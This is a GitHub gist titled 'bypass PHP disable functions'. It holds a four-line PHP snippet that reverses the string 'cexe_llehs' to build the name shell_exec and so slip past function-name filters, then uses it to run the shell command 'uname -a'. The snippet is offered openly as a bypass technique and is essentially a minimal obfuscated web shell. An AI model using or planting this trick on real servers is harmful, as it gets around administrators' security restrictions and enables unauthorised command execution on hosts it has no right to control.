Skip to content

Instantly share code, notes, and snippets.

@ardhptr21
Created May 8, 2023 16:03
Show Gist options
  • Save ardhptr21/30eeb494dfd7e006da35c40dfa497c5c to your computer and use it in GitHub Desktop.
Save ardhptr21/30eeb494dfd7e006da35c40dfa497c5c to your computer and use it in GitHub Desktop.
bypass PHP disable functions
<?php
$n = "cexe_llehs";
$b = strrev($n);
print($b('uname -a'));
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment